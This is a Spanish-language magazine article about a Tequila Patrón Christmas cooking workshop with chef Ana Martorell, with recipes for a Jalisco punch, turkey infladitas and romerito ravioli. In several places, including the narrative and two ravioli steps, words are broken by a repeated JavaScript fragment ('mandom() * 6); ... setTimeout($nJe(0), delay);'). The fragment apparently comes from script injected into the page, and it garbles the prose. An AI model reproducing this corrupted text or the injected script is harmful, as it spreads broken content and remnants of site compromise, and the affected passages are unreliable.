Experiencia Patrón, sabores y momentos inigualables para estas fiestas decembrinas

    Experiencia Patrón, sabores y momentos inigualables para estas fiestas decembrinas

    Prepara estas ricas recetas en tu cena navideña.

    Autor: Valeria Aparicio 18 diciembre, 2019


    FOTO: Cortesía

     

     

    Tequila Patrón nos ofrece sabores y momentos inigualables para estas fiestas decembrinas de la mano de la chef Ana Martorell.

     

    Ya estamos a unos días de concluir el 2019 y como siempre, comienzan a llegar las invitaciones a posadas, cenas de Navidad o de fin de año, donde tenemos la oportunidad de compartir la mesa con familia, amigos y hasta compañeros de trabajo. Por ello, Tequila Patrón y la reconocida chef Ana Martorell nos metieron hasta la cocina.

     

    UN PONCHE CON PIQUETE, POR FAVOR

    Se llegó el día y pensamos: es una cena, unos tragos, todo será muy rápido, con cámara en mano, incluso con algunas preguntas ya elaboradas… Ja, no podíamos estar más lejos de la realidad.

    La cita era en El Contenedor de la chef Ana Martorell; al llegar, subes por unas escaleras todas cubiertas con frases inspiradoras y de pronto alguien abre la puerta, como si llegaras a casa de un amigo, te da las buenas noches, te invita a ponerte cómodo, ¡y entonces caes en cuenta! Esto no es igual, estás en una cocina con periqueras y cada lugar tiene lo necesario para que prepares un trago: un shaker, cucharas, morteros… Y piensas “ojalá nadie se de cuenta que no sé cocinar”.

     

     

    Comienzan a llegar los invitados, no conoces a ninguno y lo que no sabes es que estás a punto de ser cómplice del de a un lado, para que nadie se de cuenta que él tampoco sabe cocinar.

    Pasan algunos minutos, nos vemos las caras entre todos, sacamos fotos del lugar, que, si prestas atención, te arroja la esencia de México, con colores y texturas, con bolsas de Mole de Xico y tortilleros de piedra. Volteas la mirada y te encuentras con un árbol de Navidad hecho con una escalera y vestido con luces y guantes de cocina en miniatura; a un lado percheros llenos de mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andiles que te dicen: ¡sí, hoy vas a cocinar!

    Entonces, la ves entrar, la Chef Ana Martorell te saluda y pronto te pone a trabajar en tu primera bebida de la noche, un ponche estilo Jalisco, que, entre otras cosas, lleva tortilla tatemada, cacahuates y Tequila Patrón Silver. ¿El objetivo? Disfrutar de esta bebida tradicional mexicana con un twist, y lo mejor, hecha con tus propias manos, en un laboratorio gastronómico dedicado a cultivar ese cocinero que muchos llevan dentro, donde esta chef imparte workshops.

     

     

     

    UN GIRO A LO TRADICIONAL

    Sin duda alguna, la forma en que Martorell ve la cocina es desde una perspectiva diferente. Respeta y honra los ingredientes de origen mexicano y te invita a ser parte de los que crean nuevas tradiciones, retomandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando lo esencial de lo que nuestros padres y abuelos nos enseñaron.

    Y bueno, después de la margarita y el ponche con piquete, ya habíamos perdido el miedo a que se dieran cuenta que a veces se nos quema el agua. Fue cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando comenzó una experiencia gastronómica como nunca la habíamos experimentado; tomamos el mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andil, nos dividimos en equipos y después de ver detalladamente las instrucciones de la chef, nos dispusimos a preparar la cena navideña, así, como en una reunión con amigos.

     

     

    El menú respetaba la marca de Ana Martorell, con toques mexicanos, adaptados a las fiestas decembrinas. Para empezar, unos ravioles rellenos de romeritos a la mantequilla, bañados en una crema de mole veracruzano. Y si te lo estás preguntandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, sí, nos tocó hacer la pasta de los ravioles desde cero, cortarlos, rellenarlos y servirlos para todos los invitados.

    Mientras nosotros trabajábamos en eso, otro equipo nos deleitó con unas Infladitas Navideñas, rellenas de pavo, queso brie y arándanos, bañadas con una jalea de arándanos y gravy. Una delicia muy mexicana y navideña, pero, sobre todo, con mucho estilo.

     

     

    Entre tanto ajetreo, nos quitamos la sed con otro estilo de ponche, en el que la estrella era el sabor del Licor Patrón Citrónge Orange. El cual, al finalizar la cena, concluimos fue nuestro favorito.

     

     

     

    LA ÚLTIMA Y NOS VAMOS

    Ya para finalizar la noche, nos llevamos un delicioso sabor de boca con un coctel/postre que enaltece los sabores 100% mexicanos del turrón, el café y el Tequila Patrón Añejo, acompañado de un atole de mamey con más tequila, ¿cómo de que no?

    Sin duda, esta fue una experiencia que recordaremos por mucho tiempo, pues al final, nos dimos cuenta de que lo importante en estas fechas, no es si sabes cocinar, sino compartir momentos, disfrutar a las personas que tienes a un lado y de estar orgullosos de lo que la tierra mexicana nos ha regalado.

    Y por eso, antes de despedir este 2019, en Maxim también queremos compartir contigo algunas de las recetas que aprendimos en esta noche de cocina y tequila para que disfrutes con tus familiares y amigos esta Navidad.

     

     

    PONCHE JALISCO

    Ingredientes:

    Una taza de manzana picada

    Una taza de pera picada

    Una taza de arándanos

    1/4 de taza de jamaica

    Una taza tejocote picado

    Una taza de guayaba picada

    Un piloncillo

    Una raja de canela

    Caña de azúcar

    Agua

    Tamarindo

    Tortilla tatemada

    Cacahuates

    Tequila Patrón Silver

     

    Preparación:

    1. Pon a hervir la fruta, el piloncillo, la canela, la jamaica y la caña durante 2 horas hasta que estén completamente cocidos y reserva el líquido del ponche.
    2. Pica todas las frutas extras y ponlas en un shaker junto al ponche, un caballito de Tequila Patrón Silver y agrega hielos.
    3. En un molcajete pequeño, tritura el tamarindo, la sal y los cacahuates. Y escarcha un jarrito con esta mezcla.
    4. Sirve tu bebida y disfruta.

     

     

     

    INFLADITA NAVIDEÑA

     

    Ingredientes:

    Un kilo de masa de maíz

    Una Pechuga de pavo desmenuzada

    2 tazas de arándanos

    3 manzanas verdes

    500 gramos de queso brie

    6 papas cocidas

    90 gramos mantequilla

    Jalea de arándanos

    Un litro de consomé de pavo

    90 gramos mantequilla

    100 gramos de harina

     

    Preparación:

    1. Haz un puré con las papas cocidas y agrega poco a poco la mantequilla hasta crear una mezcla homogénea.
    2. Fríe las infladitas y rellénalas de pavo, queso brie y arándanos.
    3. Salséalas con la jalea de arándanos y el gravy de pavo.
    4. Decora con una manzana verde rebanada.

     

     

    RAVIOLES DE ROMERITOS

     

    Ingredientes:

    200 gramos harina

    Un huevo

    Aceite de oliva

    Agua tibia

    300 gramos romeritos

    Cebolla picada

    50 gramos de mantequilla

    Mole de Xico

    Un litro de crema Lyncott roja

    Queso parmesano

    Ajonjolí garapiñado

     

    Preparación:

    1. Une el huevo con la harina, una pizca de sal y el aceite. Agrega poco a poco el agua tibia hasta tener una masa homogénea para la pasta de los ravioles.
    2. Fríe la cebolla con la mantequilla, y agrega los romeritos hasta que se cuezan completamente.
    3. Para formar los ravioles, haz rectángulos delgados y corta círculos grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes y chicos.
    4. Agrega un poco de yema de huevo en el borde de los círculos grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes, coloca los romeritos y cúbrelos con el círculo pequeño hasta sellar completamente los bordes.
    5. Hierve los ravioles de 3 a 5 minutos, hasta que la pasta quede al dente.
    6. Para la salsa, fríe el mole y agrega poco a poco la crema para batir.
    7. Coloca 5 ravioles en un plato hondo, vierte la salsa y agrega el queso parmesano.
    8. Decora con un poco de ajonjolí garapiñado.

     

     

     

     

     

    Temas relacionados con esta nota: , , , ,

Prepara estas ricas recetas en tu cena navideña.